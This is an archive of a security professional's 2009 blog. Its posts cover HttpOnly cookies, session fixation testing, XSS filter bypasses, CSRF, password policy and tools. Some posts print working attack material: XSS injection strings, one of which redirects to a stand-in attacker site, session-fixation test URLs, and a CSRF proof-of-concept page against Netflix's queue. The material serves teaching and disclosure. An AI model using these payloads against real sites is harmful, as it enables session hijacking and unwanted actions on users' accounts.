Wednesday, November 25, 2009

Tomcat and HttpOnly Session Cookies

Just wanted to let you know that Apache Tomcat can now be configured to use HttpOnly session cookies. I had forgotten about Jim Manico's crusade to get HttpOnly support in Tomcat. It is a shame that it took so long to happen. Microsoft had introduced the concept of HttpOnly cookies primarily as a defense against session hijacking where a cross-site scripting attack is used to steal a session cookie. If a web application sets a cookie with the HttpOnly attribute, web browsers do not allow client-side script to access the cookie. The first browser to support HttpOnly was Internet Explorer 6 SP1 and for a long while IE was the only browser that supported it. That has changed as Firefox and Opera, for example, now support HttpOnly as well.

In Tomcat, enabling HttpOnly for the JSESSIONID is done at the context level, which means it can be controlled for each individual web application. You simply need need to add the following attribute to the <context> element:

useHttpOnly="true"

The default is "false", so you must explicitly add the line above to implement an HttpOnly session cookie. This capability first appeared in Tomcat 6.0.19 (current version = 6.0.20) as well as Tomcat 5.5.28, which is currently the latest version in the 5.5 branch.

Wednesday, November 18, 2009

OWASP Top Ten Changing for 2010

A new version of the OWASP Top Ten will be arriving in early 2010. At the AppSec DC conference, I attended a session by OWASP board member Dave Wichers that described the proposed changes. First, the emphasis will be on risk, whereas the 2007 version focused on the most prevalent vulnerabilities. The updated list considers not just prevalence, but also the damage level that could result from successful exploitation.

The biggest changes are that Malicious File Execution and Information Leakage/Improper Error Handling are dropping off the list for 2010. In their place, Security Misconfiguration and Unvalidated Redirects/Forwards are being added. Some other items are shifting around. The chart below sums up the changes very nicely.
The release candidate of the new Top Ten is now available for download as a PDF document. OWASP is requesting feedback on anything and everything until December 31, 2009. I've not yet read the document in detail. At first glance, I wonder about the naming conventions. For example, is "Injection" descriptive enough? Is "misconfiguration" a real word? Why is "Insecure Communications" changing to the more cryptic "Insufficient Transport Layer Security"? I guess now is the time to ask!

Thursday, November 5, 2009

XSS via Cookie - How Severe?

Take a web application that sets a cookie. Now let's say the application takes the cookie value included in subsequent requests and outputs it into the HTML of the responses. Also assume this occurs with no authentication required and with no output encoding being done. Yes, this application is susceptible to reflected cross-site scripting.

I recently tested such an application. Interestingly, both HP WebInspect and Burp's active scanner reported the XSS vulnerability, but they were at opposite ends of the spectrum in terms of rating its severity. WebInspect rated it "critical" (the most severe rating), while Burp rated it as "information", which implies you don't even need to concern yourself about it.

So why the big disparity in these tools? Is it critically severe, or is it really no big deal? In my view, the answer is somewhere in between. This type of vulnerability is clearly very difficult to exploit. An attacker would somehow have to cause a victim's browser to send a script-injected cookie as part of a request to the vulnerable site. But regardless of the difficulty level, the application should properly encode the cookie value when it is written into the HTML page. Please let me know your opinion on how serious you think this type of vulnerability is.

Friday, October 16, 2009

Internet Safety for Parents

A friend asked me about Internet safety including how parents can protect children from the nasty stuff that's out there. I replied by describing what I do at home. It's probably not the perfect system, but it seems to work for me.

If you know nothing about Internet safety, start by visiting the resources listed here. Educate yourself about Internet dangers and the kinds of protection available.

In terms of filtering, I recommend using the Windows Vista built-in parental controls. You can select age-appropriate access level, define time restrictions, view logs of sites visited, etc. Each user must have their own login on Vista (no sharing accounts!). If you're not using Vista, please think seriously about upgrading. The parental controls feature alone is worth the money. However, at this point in time you should probably upgrade to Windows 7 since its release date is near. I assume it has the same or even better parental controls.

Defense in depth applies in protecting children too. So for better protection, I also recommend using BlueCoat's K9 Web Protection (available for free). It is not as flexible (all users have the same filter level), but it catches some stuff that Vista doesn't. If you are currently stuck on Windows XP, use K9 at least. Just remember it is not perfect.

Finally, if you don't want a hacker opening a reverse shell and taking over your computer, make sure you check for software updates at least weekly! Or, have it done automatically if possible. These updates should include not just Windows and Anti-Virus software, but also Internet Explorer, Adobe Reader, Flash Player, Firefox, Thunderbird, Java, iTunes, etc.

Friday, October 9, 2009

Session Fixation Example

I usually see session fixation vulnerabilities with Java web applications. Just recently I found a ColdFusion application vulnerable to session fixation. This nasty security hole greatly increases the risk that users will have their sessions hijacked. Once an attacker has hijacked a session, he can view any data or perform any action that the legitimate user can. 

Both HP WebInspect and Burp Pro's active scanner failed to find this vulnerability. Testing for session fixation is quite easy to do, so I ran a quick test for it manually.

When testing for session fixation, I normally use two different browsers: IE and Firefox in this example. If the login page for an application is https://someapp.com/login, testing for session fixation consists of the following steps:
    1. Launch Firefox and navigate directly to the login page.

    2. Inspect the cookie(s) assigned by the application. For a Java web app, a JSESSIONID cookie will normally be set. In the case of ColdFusion, you normally see CFID and CFTOKEN cookies.

    3. Copy the session ID from the cookie.

    4. Construct a special URL that contains the session ID.
    For Java, it looks like this:
    https://someapp.com/login.jsp;jsessionid=[sessid]
    For ColdFusion, it looks like this:
    https://someapp.com/login.cfm?cfid=[cfid]&cftoken=[cftoken]

    5. Open IE and configure it to run through a proxy (Burp, Paros, Fiddler2, etc.).

    6. Paste the special URL into the IE address bar and hit Enter (this step simulates a victim clicking on a link in an email or Internet post).

    7. Observe the HTTP response from the server. Is there a "Set-Cookie" header? If so, what is the session ID? You have a problem if it's the same value that's in the URL. On the other hand, you're probably okay if the value is different.
The ColdFusion site I tested was handling the situation even more poorly than usual. It was not necessary to visit the site initially to obtain legitimate session IDs from the server, so steps 1-3 above weren't even needed. An attacker could make up *any* 6 digit value for "cfid" and *any* 8 digit value for "cftoken", then embed these made-up values in the malicious URL, and the application happily accepted them.

The server responded by assigning CFID and CFTOKEN cookies based on the made-up values as illustrated below.

The URL of the request was:
https://someapp.com/login.cfm?cfid=999555&cftoken=29292929

And the HTTP response contained the following headers:
Set-Cookie: CFID=999555; path=/; Secure
Set-Cookie: CFTOKEN=29292929; path=/; Secure

Saturday, October 3, 2009

Who Has the Answers to Your Security Questions?

I'm back after a summer that was crazy busy for me. Recently, I had two eye-opening occurrences where other people viewed the answers to my personal security questions - you know, those questions that web sites ask in case you forget your password. These incidents weren't security breaches, just normal business processes that appear to be more prevalent than I thought.

In the first incident, I got a new cell phone for my daughter at a retail store of one of the major providers. I gave the clerk my cell number so he could look up my account and he then asked for my "PIN". I didn't know it. I knew my password for their site, but that's not what he wanted (I wouldn't have told him anyway). Since I didn't know my PIN, the clerk followed up by asking me "What's the model of your first car?". Whoa. I proceeded to answer the question. He looked at his monitor and said "okay, good".

The other incident involved Vanguard again. I got locked out of their site (not just unrecognized like last time). The darn thing wouldn't even allow me to answer my security questions. Forced to call Vanguard customer service, I explained to the CSR that I was completely locked out. Wouldn't you know the CSR simply asked me to answer two of my security questions? I provided the correct answers, and he immediately unlocked my account allowing me to log in again.

Moral to the story: These answers are not simply being used programmatically or being treated as confidential data. Realize that the answers to your personal security questions could be viewed by other people in many cases.

Wednesday, June 24, 2009

Vanguard.com Doesn't "Recognize" Me

I upgraded the hard drive on my home computer. The first time I tried to log into my Vanguard account online, it asked me to answer a security question. No problem I thought to myself. The site just doesn't recognize me since I have a new drive. It wants extra information to be sure I'm me. This is part of PassMark "sitekey" functionality. I typed in the answer to the question and was promptly told "sorry, invalid answer". Weird. I tried again. same result. I was 95% sure I was entering the correct answer, but each time I tried, it didn't work. Eventually I got an email telling me I disabled my ability to log in from an unrecognized computer due to repeated wrong answers. Nice. The web site didn't inform me of this - only the email. The email also stated I could now only log in if I used a recognized computer. To log in from an unrecognized computer, I would have to reset my security questions or call Vanguard customer service. Great.

Luckily, I had logged into Vanguard from my work computer, meaning it was "recognized" and I wasn't asked a security question. Using my work computer, I logged in and reset my security questions and answers as required. Now back to my home computer. I was quite confident facing a security question this time. But again, failure! Why does it not accept my answer? I was 100% sure it was correct this time. I just reset them for cryin' out loud.

At this point I concluded that it was a bug in Vanguard's site. Do I call their customer support? Ugh. Instead I took the approach of trying to get the site to "recognize" my home computer. Long story short, I copied a single file from my work computer to my home computer and solved the problem. I knew the PassMark/sitekey solution uses a Flash local shared object to determine whether a computer is recognized. It does not use a persistent cookie as you might first guess. Anyway, I found the shared object file "PassMark.sol" in the following directory on my work computer:

C:\Documents and Settings\[user]\Application Data\Macromedia\Flash Player\#SharedObjects\xxxxxxxx\vanguard.com\passmark\flash\pmfso.swf

where "xxxxxxxx" changes for different users. I copied PassMark.sol over to the corresponding directory on my home computer and it worked like a charm! Vanguard's site suddenly recognized my home computer and I got logged in.

This episode was very frustrating and got me wondering how normal users feel. After all, I was only able to solve the problem with:
  • Luck - I had another computer that was recognized
  • Esoteric knowledge - Vanguard's site uses Flash shared objects to recognize a computer
The vast majority of users are not web application security experts. They must be going crazy, and on the phone with support a lot.

Monday, June 8, 2009

Patent Abuse?

This is not strictly an application security post, but I just read an amazing article about a security/tech company here in Dallas. I had never heard of DeepNines, Inc. even though I live in DFW and work in the information security field. Based on the article, my first impression of DeepNines is not good. Apparently they won an $18 million settlement against McAfee because McAfee violated their patent. Their patent is "for detecting attacks on a site in a communications network and for taking actions to reduce and/or redirect such attacks". Not satisfied with their windfall, they are suing again, this time Secure Computing, which was just acquired by... McAfee. Now McAfee has to deal with them all over again!

This looks like an egregious case of patent trolling to me. How could a patent be granted for such a thing? Patents are supposed to be "nonobvious to a person having ordinary skill in the area of technology related to the invention" (ref). It's highly questionable that's true here. It's like patenting a steering wheel as "the process of taking an action to cause the rotation about a vertical axis the front-most wheels of a vehicle causing said vehicle to turn in a rightward or leftward direction."

One of my previous employers is dealing with something very similar. It's too bad there are companies that don't like to compete on the merits of their technology or customer service. They find it easier to acquire questionable patents and then sue the pants off anyone they see as a threat. For some companies, patent trolling actually seems to be the true business model.

Wednesday, May 27, 2009

Simultaneous Sessions for a Single User

It's a common request or recommendation that a web application not allow a user to have more than one session active at a time. In other words, after a user logs into an application, he should not be permitted to open a different type of browser (or use another computer) to log in again until his first session has ended. I've recommended this myself, but it's always been kind of muddy as to why this should be done. It is not trivial to implement this feature in the code. Recently, one of our clients wanted to better understand the reasons behind this recommendation. I was given the task of explaining.

The bottom line is that I could not find one strong, clear-cut reason for disallowing simultaneous sessions for a single user. There are a number of scenarios where it might help. Listed below are the reasons I came up with for implementing this feature. Please let me know if you have other ideas on this subject.
  • An application has a licensing scheme that allows only a limited number of concurrent users or requires users to pay for access or premium content. A technical control to prevent simultaneous sessions for a single user ID would limit the financial harm caused by users sharing login credentials.
  • It is out of the ordinary for a user to be logged in from more than one location (or more than one type of browser) for a given point in time. Anything out of the ordinary should be assumed to be a potential security risk.
  • An attacker somehow steals a user's credentials (perhaps by sniffing unencrypted HTTP traffic) while the user was authenticating to the application. The attacker immediately tries to log in with the stolen credentials. The application sees that the user is already logged in and returns an error to the attacker, thus temporarily protecting the account.
  • An attacker shoulder surfs to obtain a valid username (but not the password). He then immediately proceeds to run a password guessing or dictionary attack hoping to determine the password. If his attack happens to be successful during the time the legitimate user is logged in, it would prevent the attacker from gaining access.
  • An attacker and a victim log in such that their sessions overlap. The application displays an error message that alerts the victim that someone else is using his account. The victim may contact the site owner, spurring an investigation, which might uncover a compromised account.
  • It could help ensure data integrity and non-repudiation. A user may have multiple authenticated sessions at the same time, and one of the sessions might be used to make a critical change. If a user claims he never made such a change, it could be a problem for the logs to show that two authenticated sessions existed and the user claims he was logged in only once.
  • It could help defend against a malicious user who wishes to overload the server memory by creating an excessive number of authenticated sessions. Authenticated sessions typically use much more memory on the server than unauthenticated sessions. With valid credentials and no limit to simultaneous sessions, a user could potentially create a denial-of-service condition.
After my research, I came to the conclusion that disallowing simultaneous sessions often does not increase an application's security posture enough to justify the required development and implementation cost. Obviously there are some special situations, like the licensing issue, where it could make sense.

This feature may actually introduce new problems. Let's say a user logs into an application and his machine crashes or the power goes out. A few minutes later, when trying to log in again, the user is denied access and told he's already logged in. Of course, it's true from the server's perspective (his session is still active), but now there's an angry user shouting profanities at his computer. Unless the user knows his previous session ID (fat chance), there's nothing for him to do but wait until the session expires due to inactivity or call your customer service department and complain.

Monday, May 18, 2009

The Importance of Case-Sensitive Passwords

It is rare that I encounter a web application that doesn't support case-sensitive user passwords. But it still happens. In my experience this often occurs not because the application developers weren't cognizant of security, but because the authentication is actually processed by an old, backend system that doesn't support case-sensitive passwords. Let's review why implementation of case sensitive passwords is so important.

At first you might think that having case-sensitive passwords would double the number of possible passwords. Of course, that is not how it works. Let's say a user decides he wants a password of "orange7". Without case sensitivity, the number of possible passwords for this user is exactly one. But with a case-sensitive password, the user can choose from sixty-four possible passwords:

orange7 Orange7 oRange7 orAnge7 oraNge7 oranGe7
orangE7 ORange7 OrAnge7 OraNge7 OranGe7 OrangE7
oRAnge7 oRaNge7 oRanGe7 oRangE7 orANge7 orAnGe7
orAngE7 oraNGe7 oraNgE7 oranGE7 ORAnge7 OrANge7
OraNGe7 OranGE7 OrAnGe7 OrAngE7 OraNgE7 ORaNge7
ORanGe7 ORangE7 oRANge7 oRaNGe7 oRanGE7 oRAnGe7
oRAngE7 orANGe7 orAnGE7 orANgE7 oraNGE7 oRaNgE7
orANGE7 oRaNGE7 oRAnGE7 oRANgE7 oRANGe7 OraNGE7
OrAnGE7 OrANgE7 OrANGe7 ORanGE7 ORaNgE7 ORaNGe7
ORAngE7 ORAnGe7 ORANge7 oRANGE7 OrANGE7 ORaNGE7
ORAnGE7 ORANgE7 ORANGe7 ORANGE7


So, having case-sensitive passwords vastly increases the universe of possible passwords and sets the bar significantly higher for hackers running brute force or dictionary attacks on a web application. For example, 64 passwords must be checked versus only one in the scenario presented here.

As an end-user, be sure to take advantage of case sensitivity to strengthen the security of your account. Use a mixture of upper and lower case letters, plus numbers. It may prevent a lazy or time-crunched attacker -- who checks lower case passwords only -- from compromising your account.

Wednesday, May 13, 2009

IE Developer Toolbar Follow-Up

In an earlier post, I had commented on the fact that the IE Developer Toolbar has a problem in that it doesn't report cookies that are marked with the "HttpOnly" attribute. Well, as they said in the movie Independence Day, that's not entirely accurate (clip). There is an exception. The exception is when the cookie is a persistent cookie. The tool apparently doesn't utilize JavaScript in that case, and correctly reports the existence of the cookie. It's not actually a situation that would occur very often. Applications normally only need to mark *sensitive* cookies with HttpOnly, and sensitive cookies should not be persistent in the first place.

Saturday, April 25, 2009

More on Blacklisting and XSS

Following up on my last post, another scenario where blacklisting of angle brackets doesn't work to stop XSS is where untrusted data is output into an existing section of script. Consider a JSP application that takes a URL parameter and outputs it within opening and closing <script> tags. If encoding is not being done, which it often isn't, then an XSS attack would be possible. An attacker would simply close the previous executable line of script with a semicolon and immediately follow that with his malicious script.

An example of how this might occur is shown below. A JSP defines a JavaScript function called "gotoPreferences()", which causes the browser to re-navigate to a URL ("prefURL"). Note that prefURL is constructed dynamically by incorporating untrusted data -- the "category" parameter.

<script type="JavaScript">
function gotoPreferences()
{
var prefURL="https://www.server.com/prefs.jsp?category=" + <%= request.getParameter("category") %> + ";"
location.href=prefURL;
}
</script>

To exploit XSS, an attacker might set the value of "category" to:

"";location.href="http://www.evilsite.com"


The resulting line in the HTML would then be:

var prefURL="https://www.server.com/prefs.jsp?category=" + "";location.href="http://www.evilsite.com";

When the function was called, the victim would be navigated to the attacker's site instead of the expected URL.

Thursday, April 23, 2009

Blacklisting and XSS Failures

Looking at a financial application, I was somewhat surprised to see blacklisting of angle brackets used as the main countermeasure against cross-site scripting. Stripping angle brackets or throwing an error every time you see one in a request is not sufficient protection against XSS. There were a couple of ways to exploit XSS in this application despite the rigorous rejection of angle brackets.

One attack vector was due to a page that accepted a parameter containing a relative URL to another page in the application. It ended up being a tailor-made way for someone to avoid the blacklisting altogether. When a request was received, this special page caused a forward (not a redirect) to the specified URL. The code that rejected angle brackets was hit on the request from the client only, and not when the forwarding was done. Therefore, "<" and ">" could be slipped in by double URL-encoding them in the initial request as follows: %253C and %253E (%25 is a URL-encoded percent sign).

The other XSS attack vector was via JavaScript event handlers. This technique is available when user-supplied data is output to the attribute list of a page element. This often happens for an <input> tag, where the HTML form has multiple text inputs. The user enters the data, but one or two values may be invalid, so the application returns the same page and prepopulates the values that were entered. An attacker can employ XSS by closing off the previous attribute with a double-quote (assuming double-quotes were used) and injecting an event handler such as onMouseOver, onFocus, or onClick.

An example injection is: x%22%20onFocus%3d%22alert('xss')%22%20%22. The resulting HTML might look like this:

<input type="text" name="val5" value="x" onFocus="alert('xss')" "">

Notice there were no angle brackets used in this attack, so blacklisting those characters did not provide any protection.

Friday, April 10, 2009

Just Say No to Forced Password Changes

Don't force web application users to change their passwords. Instead, require strong passwords from the outset. I feel sorry for users when I see strong password requirements with forced password change after a certain time. The aggravation and inconvenience for users is not worth the trouble. In fact, for web applications, forcing passwords changes may actually increase the chance that passwords will be compromised. The reason is in how a brute force attack is done: a malevolent person with a valid username systematically tries every possible password combination hoping to get a hit. Depending on password complexity, it could take decades or longer.

Let's say the minimum password length for a web application is 8 characters, and a certain user has chosen an initial password of "muiylmo9". Now assume a slow brute force attack on that user's account is launched, where a password of "aaaaaaaa" is tried, then "aaaaaaab", then "aaaaaaac", and so on. Some time after this attack begins, the user is forced to change his password and he chooses "aciylmo9". The result? The user's password is now more likely to compromised earlier on in this attack. The user's account would have been more secure if the password had never changed. This might be a simplistic scenario, but I think it demonstrates the dubious nature of it all.

Forced password changes make more sense when passwords are stored in a file of some sort (e.g., Apache HTTP Server or Windows) that could be stolen and brute-forced via rainbow tables in offline mode. If a password is cracked in that scenario, the account may still be safe if the user has changed his password.

Friday, March 27, 2009

Forgot Password Best Practices v2

I just finished an update of my white paper that describes best practices for creating a secure "forgot password" feature. There are two important additions to the paper.
  • A section to describe an extra step that can be taken to provide even more protection. This step involves using email as an out-of-band communication channel.
  • A paragraph to explain that the recommendations may not be feasible for all web sites. The concepts presented in the paper are most relevant for organizations that have a business relationship with users.
I also dumped of "Billy Bob" as the name of the hypothetical user in favor of "Joe". I grew tired of the campy name and don't want to imply that users are stupid or unsophisticated, even though some could perhaps accurately be characterized in that way.

Thursday, March 12, 2009

Discover Card Subterfuge?

I've had a Discover Card for about 18 years. My account number never changed in all those years. Suddenly out of the blue, with my card expiration date many years in the future, I got a message from Discover politely informing me that I would be getting a new card with a different account number. Hmm, that's strange. The reason? I was told it's because of a "systems upgrade" giving me great benefits like "enhanced security monitoring" (see screen shot below).

I don't buy it. It's heavy on spin and doesn't pass the smell test. How does changing 12 digits in my account number (all Discover Cards start with "6011") enable such great new capabilities? I guess Discover wants me to believe that they don't have the technological know-how to transfer my existing account data into their new, powerful system. A more likely reason is that my account number was part of a data breach, and Discover decided to issue new cards to fend off any potential fraud for which they would be liable.

Friday, February 27, 2009

Getting the CSSLP

I am pleased to report that I'm now a Certified Secure Software Lifecycle Professional, or CSSLP. This is an (ISC)2 certification introduced late last year. The name doesn't exactly roll off the tongue, but my employer was kind enough to pay the $550 fee (normally $650) for me to go through the gauntlet required to get this cert. Actually, it wasn't that bad. Up until March 31, 2009, CSSLP candidates are not required to take and pass an exam. Instead, you have to submit and pass the CSSLP Experience Assessment. Essentially, this consists of submitting your current resume, writing four essays of 250-500 words each, and getting an endorsement from an (ISC)2 credential holder.

The four essays are not difficult if you have the right experience, but they were time consuming for me. I spent about an hour on each one. The essays must describe your professional experience in 4 of 7 different topic areas:
  1. Applying Security Concepts To Software Development
  2. Software Requirements
  3. Software Design
  4. Software Implementation/Coding
  5. Software Testing
  6. Software Acceptance
  7. Deployment,Operations, Maintenance And Disposal
I have experience in all of these areas, but I chose #1, #3, #4, and #5 for my essays. These topic areas correspond to the domains that represent the CSSLP Common Body of Knowledge (CBK). I'm looking forward to using my experience and knowledge in this area more as time goes on. There seems to be a nascent trend in the industry to be more proactive about developing secure applications, hence a new cert like CSSLP. I believe assessments and penetration testing will continue to be important, but introducing security elements earlier in the process is bound to pay off in more secure software. Hopefully, my new certification will pay off my company and for me.

Thursday, February 19, 2009

DirBuster Shoots and Scores!

There's a new tool I'm using as part of my security assessments and it is DirBuster. Developed by James Fisher and now available from OWASP, DirBuster's purpose is to sniff out the existence of directories and files on a server. Nothing more and nothing less. I did not have high expectations when grabbing a copy of DirBuster from the OWASP site. I was shocked at how many features it provides and how well it performs! Don't let the version number of 0.12 fool you. It's a very capable and polished tool.

DirBuster is written in Java (requires v1.6 or above), and the user interface is simple and intuitive. Even the look and feel is top-notch - much better than WebScarab or Burp Suite, for example, which use the default Swing look and feel. James wisely chose to use JGoodies, an open source library designed to make a more esthetically-pleasing Java user interface.

Once you start a scan, DirBuster goes to work. It lists directories and files as they are found. Since some servers don't return 404/Not Found for non-existent directories and files, DirBuster identifies positive hits by comparing each response to a base response for a known, non-existent resource.
Some of the bells and whistles in DirBuster include:
  • configurable number of threads and ability to throttle up or down while a scan is running
  • ability to scan for directories, files, or both
  • file checks are done using extension(s) of your choice
  • ability to narrow a scan to a particular subdirectory
  • ability to do recursive scanning
  • ability to load payloads from a file or to configure pure brute forcing
  • customizable request headers
  • support for basic, digest, and NTLM authentication
  • fuzzing capability for resources that are referenced by URL parameter
  • ability to send traffic through a proxy
  • an informative scan status screen
  • report generation (text files)
  • automatic update feature
For being so polished, DirBuster has some quizzical misspellings. Another small quibble is that the tool's "advanced options" are not saved after you close it down. The author told me there is a new version in the works, and both of these issues will be addressed.

Wednesday, February 4, 2009

CSRF in Novell GroupWise WebAccess

Adrian Pastor found some nasty CSRF issues in Novell GroupWise WebAccess. The one that is truly evil genius is being able to use CSRF to create a forwarding rule in the victim's email settings, allowing an attacker to get a copy of every email the victim receives. Imagine if an executive in a company fell victim. Talk about information leakage!

The point about CSRF that many people do not understand is that you can fall victim
  • without knowing it has happened
  • without clicking a malicious link
  • without JavaScript enabled in your browser
  • with your company having an iron-clad perimeter firewall
The vulnerabilities were responsibly disclosed and Novell has a patch available. It'd be nice to know how the remediation was done. Alas, I do not have a GroupWise system into which I could dive.

Tuesday, January 20, 2009

Keeping Your RapidRez Number Safe... Not!

I went through a web application for enrolling in Budget's Fastbreak service not too long ago. Upon completing the process, they gave me a special number, called my "RapidRez" number. The final page displayed my RapidRez number and gave a warm and fuzzy message stating that "for security reasons" they won't send me an email confirmation with my number. The page looks like this:
Let's ignore the fact that the HTML is screwed up, which causes the "NTRA end" comment to be visible in Firefox. Inspection of the HTML source revealed something much more interesting and somewhat disturbing.
As you can see, my RapidRez number, which is so sensitive that Budget does not want to send it to me via email, was sent to a server called adfarm.mediaplex.com. I have no idea what if anything Mediaplex does with all the RapidRez numbers they are collecting. My personal opinion is that Budget should not tout the sensitive nature of these numbers and then proceed to send them to a third party. At least don't make it so obvious! If sensitive data needs to be sent to business partners, I would suggest doing it a different way, such as a nightly batch process over a secure channel.

Thursday, January 8, 2009

IE Developer Toolbar Incompatible with HttpOnly Cookies

Today I discovered that the Microsoft Internet Explorer Developer Toolbar is not able to "see" cookies marked as HttpOnly. This is illustrated in the figures below.
Essentially, this behavior tells me that the tool accesses the cookies using JavaScript (or client-side script of some sort). Since Microsoft originated the concept of HttpOnly, you would think their tool would be able to handle it. Unfortunately, it does not, and I'm running the latest version (1.00.2188.0).

The Firefox Web Developer Toolbar, a great extension created by Chris Pederick, suffers from no such problems. Below are some screen shots to illustrate. Although it wasn't created for web application security professionals, it is an unbelievably useful tool and I highly recommend it. I often use it during application assessments to manipulate cookies, inspect forms, view all JavaScript, switch form actions from POSTs to GETs, and much more.

Friday, January 2, 2009

Netflix CSRF Revisited

A little more than two years ago, I notified Netflix about CSRF vulnerabilities on their web site. They fixed the most serious issues, such as using CSRF to change account name and shipping address or to change email address and password. I confirmed this with my testing at that time. However, I also noticed they had not implemented protection for using CSRF to add movies to a user's rental queue. I thought it strange and decided it was purposefully not done for business reasons.

I decided to revisit the issue this week by trying my original proof-of-concept CSRF attacks where any movie of an attacker's choice could be added to the top of the victim's queue. Sure enough, nothing has changed on that front. I think Netflix is risking reputation damage by not adding CSRF protection to the URL that invokes the "add movie" action.

Let's say you're logged into your Netflix account and are surfing around the Web. If you happen to encounter a page where someone has created HTML like the following, you will fall victim to a CSRF attack and have a potentially embarrassing movie arrive in your mailbox.

<html>
<head>
<script language="JavaScript" type="text/javascript">
function load_image2()
{
var img2 = new Image();
img2.src="http://www.netflix.com/MoveToTop?movieid=70110672&fromq=true";
}
</script>
</head>
<body>
<img src="http://www.netflix.com/JSON/AddToQueue?movieid=70110672" width="1" height="1" border="0">
<script>setTimeout( 'load_image2()', 2000 );</script>
</body>
</html>

Now, if you are a Netflix subscriber and want to see this sucker in action, here's your chance!

First, make sure you're logged into your Netflix account. Next, click the following link and then go check the top of your Netflix rental queue.

click here if you're logged into Netflix and want to fall victim to CSRF

Thursday, January 1, 2009

Happy New Year

Happy New Year! It is 2009 and I've decided to celebrate by joining the 21st century and starting up a new blog on application security. It remains to be seen how often I will post, but hopefully it will prove interesting and/or useful to people.